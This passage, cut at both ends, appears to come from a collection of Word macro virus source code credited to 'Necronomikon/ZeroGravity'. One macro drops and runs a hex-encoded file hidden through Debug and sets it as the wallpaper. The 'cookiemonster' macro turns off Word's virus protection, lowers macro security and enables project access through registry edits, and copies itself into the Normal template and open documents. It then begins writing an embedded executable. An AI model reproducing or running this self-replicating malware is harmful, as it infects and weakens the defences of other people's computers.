31 1D 5C" Print #1, "e 5460 B9 C1 7D C4 07 9B 52 C7 71 1E 6B BE 2E 74 B7 63" Print #1, "e 5470 B5 B0 AE A5 E4 78 21 6C B8 58 11 E2 73 63 2E 7B" Print #1, "e 5480 85 9A FA 82 A8 78 7C 44 B3 6A 36 86 A0 AC 12 8B" Print #1, "e 5490 6D 7B AF 59 C4 40 69 2C 82 95 33 97 30 D3 65 71" Print #1, "e 54A0 32 12 96 1B 82 F9 23 28 96 98 40 F3 1B 8F A8 3E" Print #1, "e 54B0 51 DC B9 8E 76 8C 2B 67 48 AB 6E 58 A7 71 87 4B" Print #1, "e 54C0 83 30 56 34 B0 77 60 96 D0 CE 25 28 3C A3 5B 29" Print #1, "e 54D0 B8 A3 DA A7 58 DE 52 2E EE 46 85 66 8F 1C 52 1F" Print #1, "e 54E0 59 48 C1 E3 6B B2 BB FC C0 08 D8 A1 BB 64 FD C5" Print #1, "e 54F0 9C 07 16 42 FD D0 1C 7E E1 30 2F 70 CF 28 11 67" Print #1, "e 5500 AD 28 4E C0 6B BE 7B 31 00 AA AC B9 BA 07 5B B3" Print #1, "e 5510 AC B4 02 98 A3 9B AC 5C 32 8D 62 09 A6 38 AA 58" Print #1, "e 5520 8C B5 4F 0A 91 4F 67 FB 80 9E 62 C5 69 05 4D C8" Print #1, "e 5530 1A F6 EB 32 71 5D FA 3E 5C F8 81 53 4C 30 6C E4" Print #1, "e 5540 F4 C2 D0 CD D2 E3 7B 00 75 67 3A E6 23 21 38 AB" Print #1, "e 5550 5B 55 E6 05 27 33 6C D9 DE 1A B9 DD 2B 14 95 4C" Print #1, "e 5560 C0 03 8C B7 E4 85 9C 05 90 7F 23 2F F2 D0 3D 7A" Print #1, "e 5570 FF 00 D2 44 DF 6B 2A AA FB AE FC C7 09 5E 87 57" Print #1, "e 5580 96 2A 1C AF 11 A0 9A 55 5E 1E D1 5B 4A 40 AF 11" Print #1, "e 5590 07 BA 52 08 D2 5B 28 55 D0 73 4E 17 82 50 D8 71" Print #1, "e 55A0 64 0E 57 5D CE 63 CB C4 16 ED 3F DB 6C B8 1C 13" Print #1, "e 55B0 7E D9 C4 4B 91 A8 E4 86 FF 00 15 FE 16 B3 7E 35" Print #1, "e 55C0 A3 5A 1E B7 86 AF 11 AB 00 D9 A0 18 34 07 38 BB" Print #1, "e 55D0 8B 40 B1 8E 79 8C 73 4A 31 C0 CB CC 00 C3 04 39" Print #1, "e 55E0 65 0D 21 3C C4 2D 81 E6 22 E5 77 10 60 26 45 7B" Print #1, "e 55F0 03 83 DC B7 A5 7E A6 98 A9 41 B1 25 2F 59 6A 1A" Print #1, "e 5600 9D 96 FA 61 8C BE 17 93 6B 19 0A 7C CB 7B 6B 3C" Print #1, "e 5610 AD B6 92 81 39 54 05 A2 59 51 2D E1 F3 6B 46 60" Print #1, "e 5620 40 D0 33 0F 4E 55 88 08 91 F0 64 4E 8D 7D 40 66" Print #1, "e 5630 9A 28 6B BE A1 A1 05 B5 CF 9B 82 24 30 D1 4E E0" Print #1, "e 5640 3F B1 EF 6F A3 07 AE 2B E7 AC A4 AC 56 41 7E C6" Print #1, "e 5650 23 04 21 E8 2B 39 BB 35 DF 51 C9 C0 38 F0 03 97" Print #1, "e 5660 9F 10 CA B4 EB 87 C9 15 CE 35 43 D0 E2 0C 26 9C" Print #1, "e 5670 2D 59 E9 9A F8 4F 90 C4 B5 DC C4 4F 3E 44 B8 EA" Print #1, "e 5680 0D 9F 31 B0 BA A3 0E 80 AF B7 A8 F1 62 85 8C 0E" Print #1, "e 5690 43 86 05 23 11 51 C3 06 F7 05 30 4A C5 3C 4C A5" Print #1, "e 56A0 7E 12 E3 86 E8 7C 8F F5 1F 6E 79 4B FD 7B FF 00" Print #1, "e 56B0 04 5B C0 17 57 D6 56 D5 F3 B0 7C 47 23 66 AB A3" Print #1, "e 56C0 F7 19 AC 5D C0 CD 1F 83 CE 4B 6A 6B AD C5 2E 55" Print #1, "e 56D0 A9 B5 7A CE 76 A1 8F 2E 42 5C EF 83 BC 3C 38 FD" Print #1, "e 56E0 C4 06 7D CE 21 01 80 7C 4C 41 85 0C A7 58 D5 F6" Print #1, "e 56F0 83 3B AE 55 E9 F9 C4 44 DF F8 5E 26 E3 08 17 AE" Print #1, "e 5700 91 28 E4 8B 3B CA AE 25 0F 53 DC 6C D2 C2 15 DE" Print #1, "e 5710 AE A0 C8 8A AB 1C 4A 1D 10 61 AC 8A FB 1E C4 07" Print #1, "e 5720 AB 35 E2 5E 66 4C AE A3 FE 79 21 B1 B5 DA 5D 4B" Print #1, "e 5730 CF 86 95 27 CB 96 C9 8B 15 7E EA 24 69 02 AC 51" Print #1, "e 5740 4D 9C F5 8E CF 06 D2 3B 4A E2 98 D5 49 9B 60 38" Print #1, "e 5750 31 AD E2 E2 1A 1A C5 7A 6C 19 EB 57 2C 46 2D 5E" Print #1, "e 5760 FC 55 69 89 CC 86 AE 89 BE EF 82 0F D6 42 63 9C" Print #1, "e 5770 5A 8C 55 95 56 78 5F 0A 45 45 BE 80 2E 94 DD 0D" Print #1, "e 5780 58 CD 45 EE A2 BC 5B 6B 71 62 26 22 C2 E9 5C 1A" Print #1, "e 5790 D9 96 E1 7C 0A 5E EB A3 6A 01 47 14 B5 DC CB DE" Print #1, "e 57A0 2B DC 84 6C B5 D2 E5 30 07 58 9F 15 01 07 62 D8" Print #1, "e 57B0 78 73 5E A1 7A 58 CD 89 F0 E6 05 53 E8 0F A3 21" Print #1, "e 57C0 F1 99 4B 3F 74 4F FC E9 F9 FC 3F 84 A9 C7 5E 91" Print #1, "e 57D0 5A 01 60 37 52 8E 4B F7 52 92 C0 23 2C 5F DC 02" Print #1, "e 57E0 C2 51 36 B7 53 05 78 CF E1 E2 DA 81 B5 18 47 25" Print #1, "e 57F0 78 8F 2E 36 6A 65 FE A0 67 49 98 19 DB C5 33 E3" Print #1, "e 5800 DB BC 29 40 E2 2E 31 1A B4 35 46 E3 20 5D D3 51" Print #1, "e 5810 11 7D 42 5B F8 20 9B 45 D1 B7 B4 28 CC C8 1F 85" Print #1, "e 5820 0F 70 36 8E 2C 47 B8 55 CC D9 3E 60 3C A1 84 1D" Print #1, "e 5830 8D 6A 32 BF 15 33 FF 00 E1 4B 95 A5 E2 56 B3 2F" Print #1, "e 5840 58 11 8E F3 30 29 73 03 1A E8 0A DE 0A 8A 8C 4F" Print #1, "e 5850 C9 D8 8A 32 F2 5F 43 F5 2F 3E 03 C3 C1 3B 8F F2" Print #1, "e 5860 5B 55 6D 4B 55 98 B3 2E 45 E0 B5 A2 B8 81 6A 29" Print #1, "e 5870 E6 12 A8 17 0C E5 6F 79 C1 7F 73 56 22 BE 11 74" Print #1, "e 5880 94 D8 0D 75 78 86 2B A3 C0 56 20 29 78 BF 03 1F" Print #1, "e 5890 B7 79 86 D1 4B 62 D3 4A 63 1D 6E 03 93 70 AB 68" Print #1, "e 58A0 5B B7 3D E1 60 DE 68 34 5B AE 15 83 18 81 9E 15" Print #1, "e 58B0 46 58 0A 5D 9F B3 AC 08 9E 0E 9B BD 91 9C 69 2F" Print #1, "e 58C0 11 05 40 E5 9E 0B 1E 6E 2E C2 23 08 0E CB 72 8E" Print #1, "e 58D0 76 B0 ED 14 34 72 A5 59 06 97 EA 53 C0 1C AA CF" Print #1, "e 58E0 A8 A0 56 DB B9 DD 4C C0 E6 2C D0 03 FB F7 38 74" Print #1, "e 58F0 C1 F9 11 8B 48 0D F6 1D 0D BE 66 7F 0C 25 6E 6E" Print #1, "e 5900 BE 91 90 93 4C 72 82 4D A6 5A 64 5B B6 3B 8C 14" Print #1, "e 5910 D4 B8 0D 1C CA B6 56 6E 2F 97 98 48 A1 54 60 23" Print #1, "e 5920 40 49 D1 98 6E D3 09 61 69 5A 8C E3 F2 56 50 24" Print #1, "e 5930 B5 41 DE 39 75 CB 62 9F 1B F9 95 0C 18 5E 0F 51" Print #1, "e 5940 6B 71 2C 04 F2 BA 08 0F 41 5D 67 E3 98 79 95 FE" Print #1, "e 5950 5C 7E 47 30 50 DF 43 31 16 DD 62 9D E3 61 0A 01" Print #1, "e 5960 BF 65 80 FF 00 B2 58 72 79 06 88 89 B0 C4 DC 4D" Print #1, "e 5970 95 E3 F2 03 70 08 51 EB 89 41 61 82 0A 0D 65 BD" Print #1, "e 5980 27 CC 0A 76 13 60 1B 03 37 77 9B 94 F4 B3 65 2C" Print #1, "e 5990 B6 1A 5F 13 32 6B 4E 8A D6 9D 62 A2 AE DB A2 E7" Print #1, "e 59A0 70 7F 62 33 EB 35 72 B2 C1 9D 65 1D 79 98 CB C5" Print #1, "e 59B0 76 B1 6A DA B3 9C A0 17 09 69 E9 EC 19 5B 1C 86" Print #1, "e 59C0 15 3A 8C 1B 53 A4 56 6F C0 0E AE A3 45 0A 34 32" Print #1, "e 59D0 1D A2 D3 77 8A AC 41 C1 33 9A CA CD 1D 65 AD A9" Print #1, "e 59E0 32 A8 27 42 E3 CE E4 F2 A4 0E 78 63 F2 3C 65 1D" Print #1, "e 59F0 E7 5C B0 92 90 DD 94 30 C4 F4 70 0D 82 2D 17 55" Print #1, "e 5A00 2A 50 DB BF 29 7F 84 95 AD 45 ED 8B 0B 10 4B 95" Print #1, "e 5A10 ED 12 EF 97 23 3F F9 33 32 A4 29 91 2E 6D E6 5E" Print #1, "e 5A20 6D 61 6E E8 9C CE 61 19 7D 14 F4 4E 35 37 18 ED" Print #1, "e 5A30 25 39 C1 11 D0 6E E0 B8 8F E4 75 71 91 D0 C0 07" Print #1, "e 5A40 AA 8A AB DE 5E 96 35 10 E4 DA 29 00 3B 23 95 EF" Print #1, "e 5A50 3A ED 2D 03 B8 65 D4 45 30 76 CC 56 AF 3A E7 EA" Print #1, "e 5A60 E2 B9 4C 41 AF 58 7E A2 40 AD 82 99 5F 8B FC 57" Print #1, "e 5A70 E7 8F C1 2B 03 CA 4B 7C B4 1E AA DD 3F D4 0F 2C" Print #1, "e 5A80 C9 49 FF 00 1D E1 5D 9E 3B E8 8C A7 65 8E 96 FC" Print #1, "e 5A90 6C A5 72 FE 2B F3 70 50 CA A9 DE 1B 4B 2A 60 C0" Print #1, "e 5AA0 F0 33 F4 0F F6 5D 3A 97 8F 3D B0 FE E3 D4 9A 70" Print #1, "e 5AB0 C9 2F 81 DA 08 30 67 55 87 44 B2 55 59 08 F8 54" Print #1, "e 5AC0 B3 12 CA DA 1E 98 99 7B AC 2F BB A2 69 B9 CC 3A" Print #1, "e 5AD0 73 41 A5 32 F9 B8 7A 57 D7 2C 85 E6 0B 28 C6 EB" Print #1, "e 5AE0 D5 26 76 C7 6F E5 82 63 31 62 D2 BF 66 61 4A 14" Print #1, "e 5AF0 E6 A1 C3 9E 74 F9 0A 8D 95 35 B2 1B F7 16 CA B3" Print #1, "e 5B00 79 B6 33 AA 4B 47 F2 13 37 DE 8A BE 1A 8A D3 19" Print #1, "e 5B10 06 67 3D 1B 03 CA B5 28 30 B6 1A 4F 4C 61 7A A7" Print #1, "e 5B20 FB 91 E4 EE C1 98 5F 98 98 61 7A 4C 74 9D 54 FA" Print #1, "e 5B30 05 ED 95 98 19 83 D6 01 01 58 EB 16 17 4D 75 FC" Print #1, "e 5B40 5F 84 61 63 D7 58 90 5B B2 CA F7 C4 B8 C1 58 5A" Print #1, "e 5B50 46 A3 B4 6A 55 DE 65 95 90 28 16 E8 E9 FE 05 59" Print #1, "e 5B60 7D 63 0A D9 90 11 ED 88 02 68 B6 9D 0F 92 2D 09" Print #1, "e 5B70 5D 03 5F 77 1D 87 39 03 FE 5F 30 06 85 C0 1F C9" Print #1, "e 5B80 78 C8 C8 C0 57 10 6B 03 35 B8 D0 C0 AB 1C 32 D0" Print #1, "e 5B90 34 5A 64 96 BB 5C 5B 99 52 B1 13 F3 51 3F 35 04" Print #1, "e 5BA0 61 81 F2 9B 25 8E 77 F8 25 7E 13 25 73 98 C5 0C" Print #1, "e 5BB0 2A B0 31 90 98 09 E8 11 3B 1B 05 2A B2 68 0A D6" Print #1, "e 5BC0 EE 5C 8C 30 37 5A FE BF 11 5D C5 00 23 42 34 AC" Print #1, "e 5BD0 D5 EB 7B 8A 02 B7 CB EC 3F D4 C5 1B BE 41 E9 DA" Print #1, "e 5BE0 0E 64 2F 96 AF 7D 37 13 5A DC 16 8F 5F DC 19 5A" Print #1, "e 5BF0 F5 64 63 1B B0 C0 0A 8D 05 F7 A6 FB 7B 11 73 0E" Print #1, "e 5C00 45 02 D3 B6 1F 10 31 2D EB A9 FF 00 D2 5B D1 71" Print #1, "e 5C10 08 97 B5 BF 70 49 D9 64 81 7B AE 99 82 71 52 83" Print #1, "e 5C20 63 09 A1 38 0D 2E E3 D2 C2 F5 73 10 52 F6 C7 82" Print #1, "e 5C30 B7 1E 35 B5 6D 1A C5 C2 08 E2 9C 17 7D 55 03 D4" Print #1, "e 5C40 4C 62 DE 07 CF 57 AA E5 F7 07 12 C0 DD 37 F7 4C" Print #1, "e 5C50 BA DC 7D 76 4F BD 18 5C B9 CC 26 6B A4 9A 0E 82" Print #1, "e 5C60 40 83 35 E0 1F D9 6A FF 00 C8 90 3F 49 56 92 E0" Print #1, "e 5C70 14 3C 4B C2 3A B2 B7 2C A8 F9 8F F8 EB 32 9B 4C" Print #1, "e 5C80 01 8F CE E5 8A A7 47 1A F2 A6 F2 75 3F 72 41 E6" Print #1, "e 5C90 12 8A 7E 88 61 B0 77 BD 1F 0A 15 4A 7A 52 04 B1" Print #1, "e 5CA0 47 74 CC 3A 8E 55 B7 02 09 4B 30 AE 2D 2F 35 89" Print #1, "e 5CB0 4F EF 4E D1 63 01 58 1B F6 CE 09 F8 BC 47 BC C6" Print #1, "e 5CC0 01 B4 60 5F FC 81 52 93 D5 AF A8 9D 49 AA 79 B7" Print #1, "e 5CD0 9E 0A 88 EB 9F C6 E5 6A 3A 08 BA 04 14 C3 A1 57" Print #1, "e 5CE0 EA 5F A5 1B BF F5 4E DE 21 87 EE 20 D8 BA 8B F5" Print #1, "e 5CF0 39 FC 57 E2 C3 BA 8B 5B 7B 89 AD 98 FD 23 49 3E" Print #1, "e 5D00 A9 55 D0 F4 EF 30 4E 16 AB A3 E4 94 5D 41 57 E0" Print #1, "e 5D10 1D 9E 8E D3 8F 4A 19 AA 43 F5 2B C3 7E B0 E1 9E" Print #1, "e 5D20 0D 67 A4 C7 CE A7 47 03 4F 3C 5F 56 05 70 50 FB" Print #1, "e 5D30 6E 0A C6 4C BD 0C 32 A3 2B 67 66 F4 C7 98 55 F3" Print #1, "e 5D40 B4 FF 00 EC A8 2C 89 4B 57 D2 EB EA 5A 8F 23 81" Print #1, "e 5D50 E7 94 73 B1 D9 00 18 96 E0 4C 59 5F 38 DC 22 B8" Print #1, "e 5D60 1E 1B 30 64 C4 CF 6A 00 2E 68 78 29 2D F1 47 4A" Print #1, "e 5D70 8A 8D 21 EB C0 FA ED 18 1D 08 E0 61 53 0A A0 3D" Print #1, "e 5D80 4C 04 29 ED 95 93 8E 98 25 C1 A2 9F BF F8 8D F3" Print #1, "e 5D90 18 E8 14 E7 DD 41 E3 0D 35 8C 89 F6 1F CB B8 C6" Print #1, "e 5DA0 D8 82 F4 20 27 DC 2B 4F 63 AF 64 B4 C4 E4 3D BA" Print #1, "e 5DB0 1F 50 73 2D EB F8 AF CD 4A 95 37 2A 2F 09 50 3B" Print #1, "e 5DC0 3E CC C6 5C 36 BC 7B 63 68 92 EA F8 40 68 5D E2" Print #1, "e 5DD0 E5 26 21 4E E7 68 94 AC 15 78 8E A7 54 07 ED 15" Print #1, "e 5DE0 5D 96 38 97 A7 21 33 E3 90 C3 F3 71 1F 4B 96 9E" Print #1, "e 5DF0 75 52 AB 8D 0D ED C9 86 5E 16 86 1F A9 72 96 E1" Print #1, "e 5E00 30 F7 3B 54 E5 A6 89 3D 0C 8E 3A C5 FD DE 22 3D" Print #1, "e 5E10 87 30 65 69 A1 33 E8 B6 59 6C 77 FB 45 3F 50 D4" Print #1, "e 5E20 A3 C8 7D 5D 4A ED 4E 29 41 F8 80 A1 2B 34 40 17" Print #1, "e 5E30 BC 28 54 21 13 79 30 FC 92 9A 07 36 DB CA 54 57" Print #1, "e 5E40 55 DB AF FD 95 44 8B 36 9F 71 9A 6D E9 B5 05 D0" Print #1, "e 5E50 BE D8 FC C0 DA F0 D7 2C 80 DC AB A5 A8 2C 5D E6" Print #1, "e 5E60 4A A8 7F 48 95 49 A3 1A 86 63 6B 68 BC B5 8B 8A" Print #1, "e 5E70 02 08 C5 B3 FB 0C 05 27 54 A0 53 8E DF F9 04 B1" Print #1, "e 5E80 B7 5C 3D B4 E2 58 BE 7B 6B 6D E7 96 D2 AF 2B D6" Print #1, "e 5E90 35 B9 F6 63 DA 9F 2C B6 52 94 A2 A7 3E EA E1 AF" Print #1, "e 5EA0 44 37 8C D5 E3 9E 03 51 42 2B B6 03 C4 0B DA 2D" Print #1, "e 5EB0 63 DC 8E EC 4A B1 F7 14 C6 55 E5 1C 2D DF F7 70" Print #1, "e 5EC0 18 10 97 61 5D F6 6A 7F 04 39 C5 3A 68 81 50 E0" Print #1, "e 5ED0 E8 6D 68 7F DC 47 49 97 4A 37 B7 59 E6 2E 22 A1" Print #1, "e 5EE0 5A 00 55 2F 93 CB 72 C6 C2 CF AA 2D F8 1F 71 3C" Print #1, "e 5EF0 6E 2B BB 56 3B 30 94 24 A8 C1 85 05 58 15 ED CE" Print #1, "e 5F00 08 D4 91 49 77 DC 9F 79 FC 30 6B 12 B8 24 0D 7A" Print #1, "e 5F10 20 87 F2 80 27 A6 6D 77 1F AE E4 FB 84 D9 97 7E" Print #1, "e 5F20 1E 7F D1 15 20 30 89 92 53 F8 A9 52 A5 62 54 A8" Print #1, "e 5F30 2A 43 61 47 99 9B 70 E3 77 D7 B4 18 01 A5 CD 92" Print #1, "e 5F40 27 37 A9 A0 9F 47 0B 99 93 5E 59 81 52 B6 10 2F" Print #1, "e 5F50 2B 8F 98 09 27 46 47 A0 AF 86 27 AD FF 00 D9 15" Print #1, "e 5F60 FD 41 13 47 23 4C B6 15 47 C4 A1 B8 C1 5E 0F 12" Print #1, "e 5F70 F2 EB 60 B7 E1 06 09 5B BA E4 62 05 51 45 05 78" Print #1, "e 5F80 63 60 03 69 7A 39 7B CB 52 51 8B 5E 18 23 45 45" Print #1, "e 5F90 5C DD 9A 89 80 35 78 16 88 82 2B 5F 61 08 40 4E" Print #1, "e 5FA0 99 20 B3 47 45 CE BC 21 6B FB 8A 88 5C C1 72 A2" Print #1, "e 5FB0 0A AD BF D8 AB 61 AB B1 86 2D B0 27 3C 45 ED 05" Print #1, "e 5FC0 87 AF 60 ED 9A 68 4F 24 CB 75 65 15 C5 84 B6 2E" Print #1, "e 5FD0 04 6F 42 10 4B 7C A7 D1 66 A0 30 20 6A 8D 46 29" Print #1, "e 5FE0 B3 AD 42 9F 8A B6 13 A2 45 EE 40 D5 E8 A7 C4 1E" Print #1, "e 5FF0 AD E4 2B 7D D6 FD C5 D1 DB 30 05 38 BE 92 8C 1D" Print #1, "e 6000 6D 74 E4 97 6D 88 B1 EA 53 F5 0B 07 4A 4D 18 0A" Print #1, "e 6010 C0 29 06 B1 EA 30 EB 70 C3 E1 6A 28 12 72 31 10" Print #1, "e 6020 79 64 75 EA E0 40 6D E1 6D F9 DC 0A ED 02 D8 21" Print #1, "e 6030 88 F1 0E C5 44 48 95 46 CC 65 7B 91 7B 82 D0 C3" Print #1, "e 6040 A7 50 21 98 E4 55 95 FA 58 78 B6 83 59 21 96 28" Print #1, "e 6050 1A 42 CC A0 11 49 9D F8 18 60 61 5A 6C ED 11 6C" Print #1, "e 6060 0E 90 21 77 11 A7 A4 0E 85 70 0C 61 4E BF D3 59" Print #1, "e 6070 83 A3 33 42 3D 97 32 A0 4A C4 09 53 89 37 05 D5" Print #1, "e 6080 CA 62 BB 7E A1 8F 9B 83 CE 60 05 10 28 A8 37 D2" Print #1, "e 6090 28 5E B5 06 6E 81 F9 8F 3C BA 35 2E 5D AE 7A FD" Print #1, "e 60A0 C6 00 81 B2 EA BE B2 E4 4A 78 66 30 0E 8A 65 60" Print #1, "e 60B0 87 68 F5 70 71 4D 54 1E D8 C1 62 56 DB 6D 6A 0E" Print #1, "e 60C0 C3 42 B3 ED 34 3D 56 65 B2 16 D1 03 42 99 2B BE" Print #1, "e 60D0 75 10 8A 1D A2 FA F7 88 24 57 C4 62 14 F5 33 35" Print #1, "e 60E0 39 B1 3C 82 00 FA 6E 3E AB 9C 1B FD 25 9C 2A 26" Print #1, "e 60F0 83 EA 2D D5 2E D5 FE A5 7C AF 02 65 BA 14 B6 AE" Print #1, "e 6100 63 D5 3C 47 59 C2 7F FF D9 00" Print #1, "rcx" Print #1, "6009" Print #1, "w" Print #1, "q" Close #1 Shell Environ("WINDIR") & "\Command.com /c Debug <" & Environ("WINDIR") & "\pothead.tmp", vbHide System.PrivateProfileString(Environ("WINDIR") & "\Win.ini", "Desktop", "Wallpaper") = Environ("WINDIR") & "\pothead.jpg" System.PrivateProfileString(Environ("WINDIR") & "\Win.ini", "Desktop", "Wallpaperstyle") = 2 kill Environ("WINDIR") & "\pothead.tmp" MsgBox "(c)by Necronomikon/ZeroGravity" ,48,"Pothead" Dialogs(wdDialogFileSaveAs).Show 'Actual Save Command End Sub Sub ViewVBCode() On Error Resume Next Application.Quit False End Sub

sources

cookiemonster Necronomikon frmcookiemonster.frm: VERSION 5.00 Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} frmcookiemonster Caption = "(c) by Necronomikon [Zero Gravity]" ClientHeight = 4260 ClientLeft = 45 ClientTop = 330 ClientWidth = 4425 OleObjectBlob = "frmcookiemonster.frx":0000 StartUpPosition = 1 'Fenstermitte End Attribute VB_Name = "frmcookiemonster" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Private Sub Image1_Click() End Sub cookiemonster.cls: VERSION 1.0 CLASS BEGIN MultiUse = -1 'True END Attribute VB_Name = "cookiemonster" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False 'cookiemonster Private Sub Document_Open() '(c)Necronomikon[Zer0Gravity] On Error Resume Next: nec = Application.Version Dim cookie As String Application.DisplayStatusBar = (3 * 0) Options.VirusProtection = (3 * 0) Options.SaveNormalPrompt = (3 * 0) System.PrivateProfileString("", "HKCU\Software\Microsoft\Office\& nec &\Word\Security", "Level") = 1& System.PrivateProfileString("", "HKCU\Software\Microsoft\Office\& nec &\Word\Security", "AccessVBOM") = 1& cookiemonster = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 328) Set nec = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then _ Set nec = ActiveDocument.VBProject.VBComponents(1).CodeModule With nec If .Lines(1, 1) <> "'cookiemonster" Then .DeleteLines 1, .CountOfLines .InsertLines 1, cookiemonster If ThisDocument = NormalTemplate Then _ ActiveDocument.SaveAs ActiveDocument.FullName End If End With cookie = InputBox("Give me a cookie:") frmcookiemonster.Show If cookie = "cookie" Then GoTo good End If If cookie = "" Then GoTo bye End If good: MsgBox "yum,yum...", vbInformation, "Cookiemonster" bye: Open "c:\cookie" For Output As #1 Print #1, "e 0100 4D 5A DA 01 09 00 01 00 20 00 FE 00 FF FF 00 00" Print #1, "e 0110 00 00 00 00 00 01 00 00 22 00 00 00 01 00 FB 10" Print #1, "e 0120 72 6A 15 03 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0400 8C CA 2E 89 16 50 02 B4 30 CD 21 8B 2E 02 00 8B" Print #1, "e 0410 1E 2C 00 8E DA A3 8D 0A 8C 06 8B 0A 89 1E 87 0A" Print #1, "e 0420 89 2E 9F 0A C7 06 91 0A FF FF 8E C3 33 C0 B9 FF" Print #1, "e 0430 7F 8B F8 8B D8 26 81 3D 38 37 75 1D 57 51 50 B0" Print #1, "e 0440 3D F2 AE E3 11 26 8A 05 24 DF FF 06 91 0A 3C 59" Print #1, "e 0450 75 04 FF 06 91 0A 58 59 5F F2 AE E3 63 43 26 38" Print #1, "e 0460 05 75 D2 80 CD 80 F7 D9 89 0E 85 0A 83 C3 07 81" Print #1, "e 0470 E3 FC FF D1 E3 89 1E 89 0A 1E B8 00 35 CD 21 89" Print #1, "e 0480 1E 7B 0A 8C 06 7D 0A B8 00 25 0E 1F BA 44 02 CD" Print #1, "e 0490 21 1F 0E FF 16 D6 0F 8B 3E D4 0F BB 00 01 3B FB" Print #1, "e 04A0 77 02 8B FB 8C DA 81 C3 AC 1F 72 14 BF 00 10 B1" Print #1, "e 04B0 04 D3 EB 43 2B EA 3B EF 77 09 87 DF 3B EF 77 03" Print #1, "e 04C0 EB 71 90 8B DF 03 DA 89 1E 97 0A 89 1E 9B 0A A1" Print #1, "e 04D0 8B 0A 2B D8 8E C0 B4 4A CD 21 D3 E7 8E D2 8B E7" Print #1, "e 04E0 E8 EE 06 E8 78 00 33 C0 2E 8E 06 50 02 BF DA 0F" Print #1, "e 04F0 B9 AC 1F 2B CF F3 AA FF 36 83 0A FF 36 81 0A FF" Print #1, "e 0500 36 7F 0A E8 59 00 50 E8 48 00 B8 00 25 C5 16 7B" Print #1, "e 0510 0A CD 21 2E 8E 1E 50 02 0E FF 16 D8 0F 8B EC 8A" Print #1, "e 0520 46 02 B4 4C CD 21 B4 40 BB 02 00 2E 8E 1E 50 02" Print #1, "e 0530 CD 21 C3 B9 1E 00 90 BA 5D 0A E8 E9 FF B8 03 00" Print #1, "e 0540 50 E8 C6 FF B9 0E 00 90 BA 4F 0A E8 D8 FF EB ED" Print #1, "e 0550 00 00 55 8B EC FF 76 04 E8 AF FF 59 5D C3 C3 55" Print #1, "e 0560 8B EC 33 C0 50 B8 BE 0D 50 B8 09 00 50 E8 D1 